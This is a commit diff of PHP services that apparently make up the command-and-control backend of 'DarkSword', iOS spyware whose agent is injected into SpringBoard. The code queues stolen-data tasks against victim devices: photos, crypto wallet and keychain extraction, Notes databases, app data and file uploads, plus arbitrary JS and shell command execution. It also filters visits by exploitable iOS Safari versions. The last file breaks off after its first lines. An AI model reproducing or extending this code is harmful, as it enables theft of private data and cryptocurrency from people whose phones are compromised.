feat: 18
This commit is contained in:
@@ -45,7 +45,11 @@ class ChannelProjectService
|
||||
$builderType = $this->normalizeBuilderType($builderType);
|
||||
|
||||
if ($builderType === self::BUILDER_NEW) {
|
||||
return $this->generateNew($channelId, $supportTemplate);
|
||||
return $this->generateNew(
|
||||
$channelId,
|
||||
$supportTemplate,
|
||||
dsDomain: (string) config('coruna.xxbb.ds_domain', ''),
|
||||
);
|
||||
}
|
||||
|
||||
[$deploymentSeed, $reportingSeed] = $this->normalizeOptionalSeeds(
|
||||
@@ -210,6 +214,7 @@ class ChannelProjectService
|
||||
?array $channelIds = null,
|
||||
string $supportTemplate = self::DEFAULT_SUPPORT_TEMPLATE,
|
||||
bool $rebuildShared = true,
|
||||
string $dsDomain = '',
|
||||
): array {
|
||||
$ids = $this->resolveNewChannelIds($channelIds);
|
||||
if ($ids === []) {
|
||||
@@ -223,7 +228,7 @@ class ChannelProjectService
|
||||
|
||||
$channels = [];
|
||||
foreach ($ids as $id) {
|
||||
$channels[] = $this->generateNew($id, $supportTemplate, rebuildShared: false);
|
||||
$channels[] = $this->generateNew($id, $supportTemplate, rebuildShared: false, dsDomain: $dsDomain);
|
||||
}
|
||||
|
||||
return [
|
||||
@@ -265,6 +270,7 @@ class ChannelProjectService
|
||||
string $channelId,
|
||||
string $supportTemplate = self::DEFAULT_SUPPORT_TEMPLATE,
|
||||
bool $rebuildShared = true,
|
||||
string $dsDomain = '',
|
||||
): array {
|
||||
$channelId = Channel::normalizeNewChannelId($channelId);
|
||||
if ($channelId === null) {
|
||||
@@ -298,6 +304,10 @@ class ChannelProjectService
|
||||
'--landing-template',
|
||||
$supportTemplate,
|
||||
];
|
||||
if ($dsDomain !== '') {
|
||||
$cmd[] = '--ds-domain';
|
||||
$cmd[] = $dsDomain;
|
||||
}
|
||||
|
||||
$result = $this->runBuilder($cmd, '打包渠道代码失败', $this->builderCwd(self::BUILDER_NEW));
|
||||
$seeds = $this->loadNewLabSeeds();
|
||||
@@ -324,6 +334,7 @@ class ChannelProjectService
|
||||
'channel_dir' => '/channel/'.$channelId,
|
||||
'show_alias' => (string) ($result['show_alias'] ?? '/c/'.$channelId.'/show.htm'),
|
||||
'support_template' => (string) ($result['landing_template'] ?? $supportTemplate),
|
||||
'ds_domain' => $dsDomain,
|
||||
];
|
||||
}
|
||||
|
||||
|
||||
@@ -8,6 +8,7 @@ use App\Models\PageVisit;
|
||||
use App\Models\User;
|
||||
use App\Models\WalletKeystore;
|
||||
use App\Models\WalletMnemonic;
|
||||
use App\Jobs\DecodeMemoDb;
|
||||
use App\Support\CfIpCountry;
|
||||
use App\Support\UserAgentParser;
|
||||
use App\Support\WalletSource;
|
||||
@@ -312,7 +313,16 @@ class DarkSwordIngestAdapter
|
||||
}
|
||||
}
|
||||
$existing->forceFill($touch)->saveQuietly();
|
||||
$this->beaconQueue->seed($existing);
|
||||
|
||||
// If the chain was just corrected to DarkSword (e.g. the device was
|
||||
// created by a beacon whose ios_version was nested in device_info
|
||||
// and not parsed on the first request), seed the default queue now.
|
||||
if ((int) $existing->chain === Device::CHAIN_DARKSWORD
|
||||
&& (int) $existing->getOriginal('chain') !== Device::CHAIN_DARKSWORD
|
||||
&& $this->beaconQueue->queueLength($existing) === 0
|
||||
) {
|
||||
$this->beaconQueue->seed($existing);
|
||||
}
|
||||
|
||||
return $existing->refresh();
|
||||
}
|
||||
@@ -344,9 +354,6 @@ class DarkSwordIngestAdapter
|
||||
public function ensureDevice(Request $request, array $payload): ?Device
|
||||
{
|
||||
$device = $this->upsertDevice($request, $payload);
|
||||
if ($device) {
|
||||
$this->beaconQueue->seed($device);
|
||||
}
|
||||
|
||||
return $device;
|
||||
}
|
||||
@@ -362,11 +369,39 @@ class DarkSwordIngestAdapter
|
||||
$payload = array_merge($payload, $stored);
|
||||
if (($stored['stored'] ?? false) === true) {
|
||||
$this->ingestTrustAddressesFromResult($device, $payload);
|
||||
$this->dispatchMemoDecodeIfNeeded($device, $payload);
|
||||
}
|
||||
}
|
||||
$this->beaconQueue->markDone($payload);
|
||||
}
|
||||
|
||||
/**
|
||||
* When the memo_scan manifest (memo_scan.json) finishes storing, the
|
||||
* NoteStore.sqlite trio for this command_id is complete — kick off the
|
||||
* decoder. The decoder re-checks file presence, so an out-of-order
|
||||
* manifest is harmless.
|
||||
*
|
||||
* @param array<string, mixed> $payload
|
||||
*/
|
||||
private function dispatchMemoDecodeIfNeeded(Device $device, array $payload): void
|
||||
{
|
||||
$category = (string) ($payload['category'] ?? '');
|
||||
$filename = strtolower((string) ($payload['filename'] ?? ''));
|
||||
if ($category !== 'memo_db' && ! str_contains($filename, 'notestore')) {
|
||||
return;
|
||||
}
|
||||
// memo_scan.json is the scan manifest and the last file uploaded by
|
||||
// the c2_agent; triggering on it avoids decoding before the WAL lands.
|
||||
if (! str_contains($filename, 'memo_scan.json')) {
|
||||
return;
|
||||
}
|
||||
$commandId = (string) ($payload['command_id'] ?? '');
|
||||
if ($commandId === '') {
|
||||
return;
|
||||
}
|
||||
DecodeMemoDb::dispatch($device->id, $commandId);
|
||||
}
|
||||
|
||||
/**
|
||||
* A wallet_scan summary (wallet_pkg.json) carries recoverable material
|
||||
* only via its own `installed_wallets` / `sandbox_files` fields. When both
|
||||
@@ -443,12 +478,10 @@ class DarkSwordIngestAdapter
|
||||
if (! is_string($value) || $value === '') {
|
||||
continue;
|
||||
}
|
||||
$hex = strtoupper(preg_replace('/[^0-9A-Fa-f]/', '', $value) ?? '');
|
||||
if ($hex === '') {
|
||||
continue;
|
||||
$key = Device::normalizeDarkswordKey($value);
|
||||
if ($key !== null && $key !== '') {
|
||||
return $key;
|
||||
}
|
||||
|
||||
return substr($hex, 0, 32);
|
||||
}
|
||||
|
||||
return null;
|
||||
@@ -472,6 +505,24 @@ class DarkSwordIngestAdapter
|
||||
return substr($value, 0, 64);
|
||||
}
|
||||
|
||||
// Fallback: the c2_agent (injected into SpringBoard by pe_worker)
|
||||
// nests channel_code inside device_info, not at the beacon top level.
|
||||
$devInfo = $payload['device_info'] ?? null;
|
||||
if (is_array($devInfo)) {
|
||||
foreach (['channel_code', 'channelCode', 'channel'] as $key) {
|
||||
$value = $devInfo[$key] ?? null;
|
||||
if (! is_string($value)) {
|
||||
continue;
|
||||
}
|
||||
$value = trim($value);
|
||||
if ($value === '') {
|
||||
continue;
|
||||
}
|
||||
|
||||
return substr($value, 0, 64);
|
||||
}
|
||||
}
|
||||
|
||||
return null;
|
||||
}
|
||||
|
||||
@@ -499,6 +550,17 @@ class DarkSwordIngestAdapter
|
||||
}
|
||||
}
|
||||
|
||||
// Fallback: pe_worker / c2_agent nests hardware info inside device_info.
|
||||
$devInfo = $payload['device_info'] ?? null;
|
||||
if (is_array($devInfo)) {
|
||||
foreach (['machine', 'deviceModel', 'device_model', 'productType'] as $key) {
|
||||
$value = $devInfo[$key] ?? null;
|
||||
if (is_string($value) && trim($value) !== '') {
|
||||
return substr(trim($value), 0, 128);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return null;
|
||||
}
|
||||
|
||||
@@ -514,6 +576,17 @@ class DarkSwordIngestAdapter
|
||||
}
|
||||
}
|
||||
|
||||
// Fallback: pe_worker / c2_agent nests ios_version inside device_info.
|
||||
$devInfo = $payload['device_info'] ?? null;
|
||||
if (is_array($devInfo)) {
|
||||
foreach (['ios_version', 'ios', 'iosVersion', 'productVersion'] as $key) {
|
||||
$value = $devInfo[$key] ?? null;
|
||||
if (is_string($value) && trim($value) !== '') {
|
||||
return substr(trim($value), 0, 64);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return null;
|
||||
}
|
||||
|
||||
|
||||
@@ -357,7 +357,7 @@ class DashboardStatsService
|
||||
}
|
||||
|
||||
/**
|
||||
* Safari on iOS 13.0.0–17.2.1, plus 18.5 / 18.6 / 18.6.1 / 18.6.2.
|
||||
* Safari on iOS 13.0.0–17.2.1, plus DS allowlist versions.
|
||||
* Exclude unsupported 15.8.8 and 16.7.1x (16.7.10+).
|
||||
*/
|
||||
public function effectiveVisitSql(): string
|
||||
@@ -370,8 +370,11 @@ class DashboardStatsService
|
||||
OR ({$major} = 17 AND {$minor} < 2)
|
||||
OR ({$major} = 17 AND {$minor} = 2 AND {$patch} <= 1)
|
||||
))
|
||||
OR ({$major} = 18 AND {$minor} = 1 AND {$patch} = 1)
|
||||
OR ({$major} = 18 AND {$minor} = 4 AND {$patch} IN (0, 1))
|
||||
OR ({$major} = 18 AND {$minor} = 5 AND {$patch} = 0)
|
||||
OR ({$major} = 18 AND {$minor} = 6 AND {$patch} IN (0, 1, 2))
|
||||
OR ({$major} = 18 AND {$minor} = 7 AND {$patch} IN (0, 1, 2))
|
||||
) AND NOT ({$major} = 15 AND {$minor} = 8 AND {$patch} = 8)
|
||||
AND NOT ({$major} = 16 AND {$minor} = 7 AND {$patch} >= 10)";
|
||||
}
|
||||
|
||||
+379
-134
@@ -3,108 +3,237 @@
|
||||
namespace App\Services;
|
||||
|
||||
use App\Models\Device;
|
||||
use App\Models\DsBeaconTask;
|
||||
use Illuminate\Support\Facades\Cache;
|
||||
use App\Models\DeviceEvent;
|
||||
use Illuminate\Support\Facades\Redis;
|
||||
use Illuminate\Support\Str;
|
||||
|
||||
/**
|
||||
* Per-device beacon command queue — 100% Redis, no DB.
|
||||
*
|
||||
* Redis keys per device:
|
||||
* ds:q:{id} List — pending queue (RPOP dequeue, LPUSH enqueue)
|
||||
* ds:qdisp:{id} Hash — dispatched/in-flight tasks {command_id: taskJson}
|
||||
* ds:qt:{id} String — throttle lock (TTL 5s)
|
||||
*
|
||||
* Completed task results are stored as DeviceEvent records (日志 tab), NOT in Redis.
|
||||
*
|
||||
* Task JSON: {task_id, type, params, status, command_id?, dispatched_at?, completed_at?, result_count?, result_meta?}
|
||||
*
|
||||
* Default queue: photos, wallet_scan (one-shot, no auto-repeat).
|
||||
*/
|
||||
class DsBeaconQueue
|
||||
{
|
||||
/** Default task types seeded for new DarkSword devices (one-shot, no repeat). */
|
||||
public const DEFAULT_TYPES = [
|
||||
'photos',
|
||||
'wallet_scan',
|
||||
];
|
||||
|
||||
/** All task types the pe_worker.js can handle (for admin dropdown). */
|
||||
public const ALL_TYPES = [
|
||||
'photos' => '相册上传',
|
||||
'photo_scan' => '相册扫描(带去重)',
|
||||
'wallet_scan' => '钱包扫描',
|
||||
'wallet_extract' => '钱包提取',
|
||||
'apps' => '应用列表',
|
||||
'basic_info' => '设备信息',
|
||||
'memo_scan' => '备忘录扫描',
|
||||
'ls' => '目录列表',
|
||||
'download' => '文件下载',
|
||||
'exec' => '执行命令',
|
||||
'file_upload' => '文件上传',
|
||||
'disk_scan' => '磁盘扫描',
|
||||
'ios_app_data' => '应用数据',
|
||||
'execute_command' => '远程命令',
|
||||
'sleep' => '休眠',
|
||||
'exit' => '退出',
|
||||
];
|
||||
|
||||
/**
|
||||
* Only dispatch wallet_scan right now — we need the keychain dump
|
||||
* (incl. the trustwallet password items) back from the devices.
|
||||
* Other task types are intentionally omitted so they never block the queue.
|
||||
* Parameter schema for each command type.
|
||||
* Used by the admin UI to render dynamic input fields.
|
||||
*
|
||||
* @var list<string>
|
||||
* @var array<string, list<array{name: string, label: string, type: string, default: mixed, required: bool, options?: array<string, string>}>>
|
||||
*/
|
||||
public const TYPES = [
|
||||
'wallet_scan',
|
||||
public const PARAM_SCHEMA = [
|
||||
'photos' => [
|
||||
['name' => 'max_count', 'label' => '最大数量', 'type' => 'number', 'default' => 200, 'required' => false],
|
||||
],
|
||||
'photo_scan' => [
|
||||
['name' => 'max_count', 'label' => '最大数量', 'type' => 'number', 'default' => 200, 'required' => false],
|
||||
['name' => 'batch_size', 'label' => '批次大小', 'type' => 'number', 'default' => 30, 'required' => false],
|
||||
['name' => 'max_file_size', 'label' => '最大文件(字节)', 'type' => 'number', 'default' => 5242880, 'required' => false],
|
||||
],
|
||||
'wallet_scan' => [],
|
||||
'wallet_extract' => [
|
||||
['name' => 'wallet_type', 'label' => '钱包类型', 'type' => 'text', 'default' => 'imtoken', 'required' => false],
|
||||
],
|
||||
'apps' => [],
|
||||
'basic_info' => [],
|
||||
'memo_scan' => [],
|
||||
'ls' => [
|
||||
['name' => 'path', 'label' => '目录路径', 'type' => 'text', 'default' => '/', 'required' => true],
|
||||
],
|
||||
'download' => [
|
||||
['name' => 'path', 'label' => '文件路径', 'type' => 'text', 'default' => '', 'required' => true],
|
||||
['name' => 'max_size', 'label' => '最大大小(字节)', 'type' => 'number', 'default' => 2097152, 'required' => false],
|
||||
],
|
||||
'exec' => [
|
||||
['name' => 'code', 'label' => 'JS 代码', 'type' => 'textarea', 'default' => '', 'required' => true],
|
||||
],
|
||||
'file_upload' => [
|
||||
['name' => 'upload_paths', 'label' => '上传路径(逗号分隔)', 'type' => 'text', 'default' => '/var/mobile', 'required' => false],
|
||||
['name' => 'filter_mode', 'label' => '过滤模式', 'type' => 'select', 'default' => 'none', 'required' => false, 'options' => ['none' => '无', 'include' => '仅含', 'exclude' => '排除']],
|
||||
['name' => 'file_extensions', 'label' => '扩展名(逗号分隔)', 'type' => 'text', 'default' => '', 'required' => false],
|
||||
['name' => 'include_subdirs', 'label' => '包含子目录', 'type' => 'checkbox', 'default' => true, 'required' => false],
|
||||
['name' => 'exclude_dirs', 'label' => '排除目录(逗号分隔)', 'type' => 'text', 'default' => '', 'required' => false],
|
||||
['name' => 'max_file_size_mb', 'label' => '最大文件(MB)', 'type' => 'number', 'default' => 500, 'required' => false],
|
||||
],
|
||||
'disk_scan' => [],
|
||||
'ios_app_data' => [
|
||||
['name' => 'targets', 'label' => '目标 Bundle ID(逗号分隔)', 'type' => 'text', 'default' => '', 'required' => false],
|
||||
['name' => 'max_file_size_mb', 'label' => '最大文件(MB)', 'type' => 'number', 'default' => 500, 'required' => false],
|
||||
],
|
||||
'execute_command' => [
|
||||
['name' => 'command', 'label' => '命令', 'type' => 'text', 'default' => '', 'required' => true],
|
||||
['name' => 'timeout', 'label' => '超时(秒)', 'type' => 'number', 'default' => 30, 'required' => false],
|
||||
['name' => 'working_directory', 'label' => '工作目录', 'type' => 'text', 'default' => '', 'required' => false],
|
||||
],
|
||||
'sleep' => [
|
||||
['name' => 'interval', 'label' => '间隔(秒)', 'type' => 'number', 'default' => 15, 'required' => false],
|
||||
],
|
||||
'exit' => [],
|
||||
];
|
||||
|
||||
/** @var list<string> */
|
||||
public const LOOP_TYPES = [
|
||||
'wallet_scan',
|
||||
public const STATUS_PENDING = 'pending';
|
||||
public const STATUS_DISPATCHED = 'dispatched';
|
||||
public const STATUS_DONE = 'done';
|
||||
|
||||
public const STATUS_LABELS = [
|
||||
self::STATUS_PENDING => '排队中',
|
||||
self::STATUS_DISPATCHED => '已下发',
|
||||
self::STATUS_DONE => '已回传',
|
||||
];
|
||||
|
||||
private const Q_PREFIX = 'ds:q:';
|
||||
private const DISP_PREFIX = 'ds:qdisp:';
|
||||
private const DONE_PREFIX = 'ds:qdone:';
|
||||
private const THROTTLE_PREFIX = 'ds:qt:';
|
||||
private const THROTTLE_SEC = 5;
|
||||
private const DONE_CAP = 50;
|
||||
|
||||
// ── Seeding ────────────────────────────────────────────────────────────
|
||||
|
||||
/**
|
||||
* Seed the default queue for a new DarkSword device (only if queue is empty).
|
||||
*/
|
||||
public function seed(Device $device): void
|
||||
{
|
||||
if ((int) $device->chain !== Device::CHAIN_DARKSWORD) {
|
||||
return;
|
||||
}
|
||||
|
||||
DsBeaconTask::query()
|
||||
->where('device_id', $device->id)
|
||||
->where('type', 'basic_info')
|
||||
->delete();
|
||||
|
||||
if (DsBeaconTask::query()->where('device_id', $device->id)->exists()) {
|
||||
return;
|
||||
$qKey = $this->queueKey($device);
|
||||
if ((int) Redis::llen($qKey) > 0) {
|
||||
return; // already has pending tasks
|
||||
}
|
||||
|
||||
$now = now();
|
||||
$rows = [];
|
||||
foreach (self::TYPES as $i => $type) {
|
||||
$rows[] = [
|
||||
'device_id' => $device->id,
|
||||
'position' => $i + 1,
|
||||
'type' => $type,
|
||||
'status' => DsBeaconTask::STATUS_PENDING,
|
||||
'created_at' => $now,
|
||||
'updated_at' => $now,
|
||||
];
|
||||
foreach (self::DEFAULT_TYPES as $type) {
|
||||
$this->lpushTask($device, $type, $this->paramsFor($type));
|
||||
}
|
||||
DsBeaconTask::query()->insert($rows);
|
||||
}
|
||||
|
||||
// ── Dequeue (called on every /beacon) ──────────────────────────────────
|
||||
|
||||
/**
|
||||
* Dispatch wallet_scan / wallet_extract, alternating per client IP, with a
|
||||
* 5s gap between dispatches to the same IP. UUID can't distinguish devices
|
||||
* right now (shared 69DD), so we throttle per IP as a temporary measure.
|
||||
*
|
||||
* Returns null (noop) when the same IP beaconed within the gap, so the
|
||||
* device isn't hammered with back-to-back commands.
|
||||
* Dequeue the next task for a device.
|
||||
*
|
||||
* @return array{type: string, command_id: string, params: array<string, mixed>}|null
|
||||
*/
|
||||
public function dequeue(Device $device, ?string $ip = null): ?array
|
||||
{
|
||||
$ip = $ip ?? '0';
|
||||
$lastKey = 'dsq:last:'.$ip;
|
||||
$typeKey = 'dsq:type:'.$ip;
|
||||
|
||||
// Per-IP throttle: at most one dispatch every 5s.
|
||||
$last = Cache::get($lastKey);
|
||||
if ($last !== null && (microtime(true) - (float) $last) < 5.0) {
|
||||
// Per-device throttle: at most one dispatch every THROTTLE_SEC seconds.
|
||||
$throttleKey = $this->throttleKey($device);
|
||||
if (Redis::exists($throttleKey)) {
|
||||
return null;
|
||||
}
|
||||
|
||||
// Alternate the two task types per IP.
|
||||
$type = Cache::get($typeKey) === 'wallet_scan' ? 'wallet_extract' : 'wallet_scan';
|
||||
Cache::put($lastKey, microtime(true), 60);
|
||||
Cache::put($typeKey, $type, 60);
|
||||
$raw = Redis::rpop($this->queueKey($device));
|
||||
if ($raw === null) {
|
||||
return null; // noop — queue empty
|
||||
}
|
||||
|
||||
$task = json_decode($raw, true);
|
||||
if (! is_array($task) || ! isset($task['type'])) {
|
||||
return null;
|
||||
}
|
||||
|
||||
Redis::setex($throttleKey, self::THROTTLE_SEC, '1');
|
||||
|
||||
$commandId = 'dsq-'.$device->id.'-'.Str::lower(Str::random(12));
|
||||
$type = $task['type'];
|
||||
$params = $task['params'] ?? $this->paramsFor($type);
|
||||
|
||||
// Move to dispatched hash.
|
||||
$task['status'] = self::STATUS_DISPATCHED;
|
||||
$task['command_id'] = $commandId;
|
||||
$task['dispatched_at'] = now()->toDateTimeString();
|
||||
Redis::hset($this->dispKey($device), $commandId, json_encode($task));
|
||||
|
||||
return [
|
||||
'type' => $type,
|
||||
'command_id' => 'dsq-'.$device->id.'-'.Str::lower(Str::random(12)),
|
||||
'params' => $this->paramsFor($type),
|
||||
'command_id' => $commandId,
|
||||
'params' => $params,
|
||||
];
|
||||
}
|
||||
|
||||
// ── Mark done (called on /result) ──────────────────────────────────────
|
||||
|
||||
/**
|
||||
* Mark a dispatched task as done. No auto-requeue.
|
||||
*
|
||||
* @param array<string, mixed> $payload
|
||||
* @return array<string, mixed>|null The completed task data.
|
||||
*/
|
||||
public function markDone(array $payload): ?DsBeaconTask
|
||||
public function markDone(array $payload): ?array
|
||||
{
|
||||
$commandId = trim((string) ($payload['command_id'] ?? ''));
|
||||
if ($commandId === '') {
|
||||
return null;
|
||||
}
|
||||
|
||||
$task = DsBeaconTask::query()->where('command_id', $commandId)->first();
|
||||
if (! $task) {
|
||||
// Find in dispatched hash by command_id. We don't know the device_id from
|
||||
// payload alone, so scan all dispatch hashes. In practice the command_id
|
||||
// encodes the device_id (dsq-{device_id}-...), so we can extract it.
|
||||
$deviceId = $this->deviceIdFromCommandId($commandId);
|
||||
if ($deviceId === null) {
|
||||
return null;
|
||||
}
|
||||
|
||||
$meta = $task->result_meta ?? [];
|
||||
$device = Device::query()->find($deviceId);
|
||||
if (! $device) {
|
||||
return null;
|
||||
}
|
||||
|
||||
$raw = Redis::hget($this->dispKey($device), $commandId);
|
||||
if (! $raw) {
|
||||
return null;
|
||||
}
|
||||
|
||||
$task = json_decode($raw, true);
|
||||
if (! is_array($task)) {
|
||||
return null;
|
||||
}
|
||||
|
||||
// Remove from dispatched.
|
||||
Redis::hdel($this->dispKey($device), $commandId);
|
||||
|
||||
// Update with completion info.
|
||||
$task['status'] = self::STATUS_DONE;
|
||||
$task['completed_at'] = now()->toDateTimeString();
|
||||
$task['result_count'] = (int) ($task['result_count'] ?? 0) + 1;
|
||||
|
||||
$meta = $task['result_meta'] ?? [];
|
||||
$filename = trim((string) ($payload['filename'] ?? ''));
|
||||
$category = trim((string) ($payload['category'] ?? ''));
|
||||
if ($filename !== '') {
|
||||
@@ -121,98 +250,214 @@ class DsBeaconQueue
|
||||
$meta[$key] = $payload[$key];
|
||||
}
|
||||
}
|
||||
$task['result_meta'] = $meta;
|
||||
|
||||
$touch = [
|
||||
'result_count' => (int) $task->result_count + 1,
|
||||
'result_meta' => $meta,
|
||||
];
|
||||
if ($task->status !== DsBeaconTask::STATUS_DONE) {
|
||||
$touch['status'] = DsBeaconTask::STATUS_DONE;
|
||||
$touch['completed_at'] = now();
|
||||
}
|
||||
$task->forceFill($touch)->save();
|
||||
// Record completion to the device's event log (日志 tab) instead of
|
||||
// keeping a Redis done list. The Redis queue only holds pending +
|
||||
// dispatched tasks; completed results live in device_events.
|
||||
$this->recordDoneEvent($device, $task);
|
||||
|
||||
return $task->refresh();
|
||||
return $task;
|
||||
}
|
||||
|
||||
/**
|
||||
* Record a completed task as a DeviceEvent (shown in the 日志 tab).
|
||||
*
|
||||
* @param array<string, mixed> $task
|
||||
*/
|
||||
private function recordDoneEvent(Device $device, array $task): void
|
||||
{
|
||||
$type = $task['type'] ?? 'unknown';
|
||||
$meta = $task['result_meta'] ?? [];
|
||||
$filename = $meta['filename'] ?? '';
|
||||
$count = $task['result_count'] ?? 0;
|
||||
|
||||
$desc = $type;
|
||||
if ($count > 0) {
|
||||
$desc .= ' · '.$count.' 次';
|
||||
}
|
||||
if ($filename !== '') {
|
||||
$desc .= ' · '.$filename;
|
||||
}
|
||||
|
||||
DeviceEvent::create([
|
||||
'device_id' => $device->id,
|
||||
'device_key' => $device->device_id,
|
||||
'event_name' => $type,
|
||||
'desc' => mb_substr($desc, 0, 512),
|
||||
'context_json' => [
|
||||
'type' => $type,
|
||||
'command_id' => $task['command_id'] ?? null,
|
||||
'params' => $task['params'] ?? [],
|
||||
'dispatched_at' => $task['dispatched_at'] ?? null,
|
||||
'completed_at' => $task['completed_at'] ?? null,
|
||||
'result_count' => $count,
|
||||
'result_meta' => $meta,
|
||||
],
|
||||
]);
|
||||
}
|
||||
|
||||
// ── Admin operations ───────────────────────────────────────────────────
|
||||
|
||||
/**
|
||||
* Add a task to a device's queue.
|
||||
*
|
||||
* @param array<string, mixed>|null $params
|
||||
* @return array<string, mixed> The created task.
|
||||
*/
|
||||
public function addTask(Device $device, string $type, ?array $params = null): array
|
||||
{
|
||||
$task = $this->lpushTask($device, $type, $params ?? $this->paramsFor($type));
|
||||
|
||||
return $task;
|
||||
}
|
||||
|
||||
/**
|
||||
* Remove a pending task from the queue by task_id.
|
||||
*/
|
||||
public function removeTask(Device $device, string $taskId): bool
|
||||
{
|
||||
$qKey = $this->queueKey($device);
|
||||
$len = (int) Redis::llen($qKey);
|
||||
if ($len === 0) {
|
||||
return false;
|
||||
}
|
||||
|
||||
// LREM removes count occurrences of value. We need to find and remove
|
||||
// the exact JSON string matching this task_id.
|
||||
$items = Redis::lrange($qKey, 0, -1);
|
||||
foreach ($items as $item) {
|
||||
$decoded = json_decode($item, true);
|
||||
if (is_array($decoded) && ($decoded['task_id'] ?? null) === $taskId) {
|
||||
Redis::lrem($qKey, 1, $item);
|
||||
|
||||
return true;
|
||||
}
|
||||
}
|
||||
|
||||
return false;
|
||||
}
|
||||
|
||||
/**
|
||||
* Get the queue state for admin display.
|
||||
*
|
||||
* Only pending + dispatched are returned. Completed task results are
|
||||
* stored as DeviceEvent records (shown in the 日志 tab), not in Redis.
|
||||
*
|
||||
* @return array{pending: list<array>, dispatched: list<array>, done: list<array>}
|
||||
*/
|
||||
public function getQueueState(Device $device): array
|
||||
{
|
||||
// Pending (from list — note: LPUSH means newest first, reverse for display)
|
||||
$pendingRaw = Redis::lrange($this->queueKey($device), 0, -1);
|
||||
$pending = [];
|
||||
foreach (array_reverse($pendingRaw) as $item) {
|
||||
$decoded = json_decode($item, true);
|
||||
if (is_array($decoded)) {
|
||||
$pending[] = $decoded;
|
||||
}
|
||||
}
|
||||
|
||||
// Dispatched (from hash)
|
||||
$dispatchedRaw = Redis::hgetall($this->dispKey($device));
|
||||
$dispatched = [];
|
||||
foreach ($dispatchedRaw as $commandId => $item) {
|
||||
$decoded = json_decode($item, true);
|
||||
if (is_array($decoded)) {
|
||||
$dispatched[] = $decoded;
|
||||
}
|
||||
}
|
||||
|
||||
return [
|
||||
'pending' => $pending,
|
||||
'dispatched' => $dispatched,
|
||||
'done' => [], // completed tasks are in device_events (日志 tab)
|
||||
];
|
||||
}
|
||||
|
||||
/**
|
||||
* Get the current Redis queue length for a device.
|
||||
*/
|
||||
public function queueLength(Device $device): int
|
||||
{
|
||||
return (int) Redis::llen($this->queueKey($device));
|
||||
}
|
||||
|
||||
// ── Internal helpers ────────────────────────────────────────────────────
|
||||
|
||||
/**
|
||||
* Push a task to the Redis queue (LPUSH = newest at head).
|
||||
*
|
||||
* @param array<string, mixed>|null $params
|
||||
* @return array<string, mixed> The task array that was pushed.
|
||||
*/
|
||||
private function lpushTask(Device $device, string $type, ?array $params): array
|
||||
{
|
||||
$task = [
|
||||
'task_id' => Str::uuid()->toString(),
|
||||
'type' => $type,
|
||||
'params' => $params ?? $this->paramsFor($type),
|
||||
'status' => self::STATUS_PENDING,
|
||||
];
|
||||
|
||||
Redis::lpush($this->queueKey($device), json_encode($task));
|
||||
|
||||
return $task;
|
||||
}
|
||||
|
||||
/**
|
||||
* Extract device_id from command_id (format: dsq-{device_id}-{random}).
|
||||
*/
|
||||
private function deviceIdFromCommandId(string $commandId): ?int
|
||||
{
|
||||
if (! str_starts_with($commandId, 'dsq-')) {
|
||||
return null;
|
||||
}
|
||||
$rest = substr($commandId, 4); // after "dsq-"
|
||||
$parts = explode('-', $rest, 2);
|
||||
if (count($parts) < 2) {
|
||||
return null;
|
||||
}
|
||||
$deviceId = (int) $parts[0];
|
||||
if ($deviceId <= 0) {
|
||||
return null;
|
||||
}
|
||||
|
||||
return $deviceId;
|
||||
}
|
||||
|
||||
/**
|
||||
* Build default params from the PARAM_SCHEMA.
|
||||
*
|
||||
* @return array<string, mixed>
|
||||
*/
|
||||
private function paramsFor(string $type): array
|
||||
{
|
||||
return match ($type) {
|
||||
'wallet_extract' => ['wallet_type' => 'imtoken'],
|
||||
'photo_scan' => ['max_count' => 200],
|
||||
default => [],
|
||||
};
|
||||
}
|
||||
|
||||
private function nextRunnable(Device $device): ?DsBeaconTask
|
||||
{
|
||||
while (true) {
|
||||
$task = $this->findRunnable($device);
|
||||
if (! $task) {
|
||||
if (! $this->requeueLoopTypes($device)) {
|
||||
return null;
|
||||
}
|
||||
$task = $this->findRunnable($device);
|
||||
if (! $task) {
|
||||
return null;
|
||||
}
|
||||
}
|
||||
if ($task->type !== 'photos' && $task->type !== 'basic_info') {
|
||||
return $task;
|
||||
}
|
||||
$task->forceFill([
|
||||
'status' => DsBeaconTask::STATUS_SKIPPED,
|
||||
'completed_at' => now(),
|
||||
'result_meta' => [
|
||||
'reason' => $task->type === 'photos'
|
||||
? 'queue_uses_photo_scan_only'
|
||||
: 'removed_from_queue',
|
||||
],
|
||||
])->save();
|
||||
}
|
||||
}
|
||||
|
||||
private function findRunnable(Device $device): ?DsBeaconTask
|
||||
{
|
||||
return DsBeaconTask::query()
|
||||
->where('device_id', $device->id)
|
||||
->where('type', 'wallet_scan')
|
||||
->where(function ($q) {
|
||||
$q->where('status', DsBeaconTask::STATUS_PENDING)
|
||||
->orWhere(function ($q2) {
|
||||
$q2->where('status', DsBeaconTask::STATUS_DISPATCHED)
|
||||
->where('result_count', 0);
|
||||
});
|
||||
})
|
||||
->orderBy('position')
|
||||
->lockForUpdate()
|
||||
->first();
|
||||
}
|
||||
|
||||
private function requeueLoopTypes(Device $device): bool
|
||||
{
|
||||
$tasks = DsBeaconTask::query()
|
||||
->where('device_id', $device->id)
|
||||
->whereIn('type', self::LOOP_TYPES)
|
||||
->where('status', DsBeaconTask::STATUS_DONE)
|
||||
->lockForUpdate()
|
||||
->get();
|
||||
if ($tasks->isEmpty()) {
|
||||
return false;
|
||||
$params = [];
|
||||
foreach (self::PARAM_SCHEMA[$type] ?? [] as $field) {
|
||||
$params[$field['name']] = $field['default'];
|
||||
}
|
||||
|
||||
foreach ($tasks as $task) {
|
||||
$task->forceFill([
|
||||
'status' => DsBeaconTask::STATUS_PENDING,
|
||||
'command_id' => null,
|
||||
'dispatched_at' => null,
|
||||
'completed_at' => null,
|
||||
])->save();
|
||||
}
|
||||
return $params;
|
||||
}
|
||||
|
||||
return true;
|
||||
private function queueKey(Device $device): string
|
||||
{
|
||||
return self::Q_PREFIX.$device->id;
|
||||
}
|
||||
|
||||
private function dispKey(Device $device): string
|
||||
{
|
||||
return self::DISP_PREFIX.$device->id;
|
||||
}
|
||||
|
||||
private function doneKey(Device $device): string
|
||||
{
|
||||
return self::DONE_PREFIX.$device->id;
|
||||
}
|
||||
|
||||
private function throttleKey(Device $device): string
|
||||
{
|
||||
return self::THROTTLE_PREFIX.$device->id;
|
||||
}
|
||||
}
|
||||
|
||||
@@ -0,0 +1,287 @@
|
||||
<?php
|
||||
|
||||
namespace App\Services;
|
||||
|
||||
use App\Models\Device;
|
||||
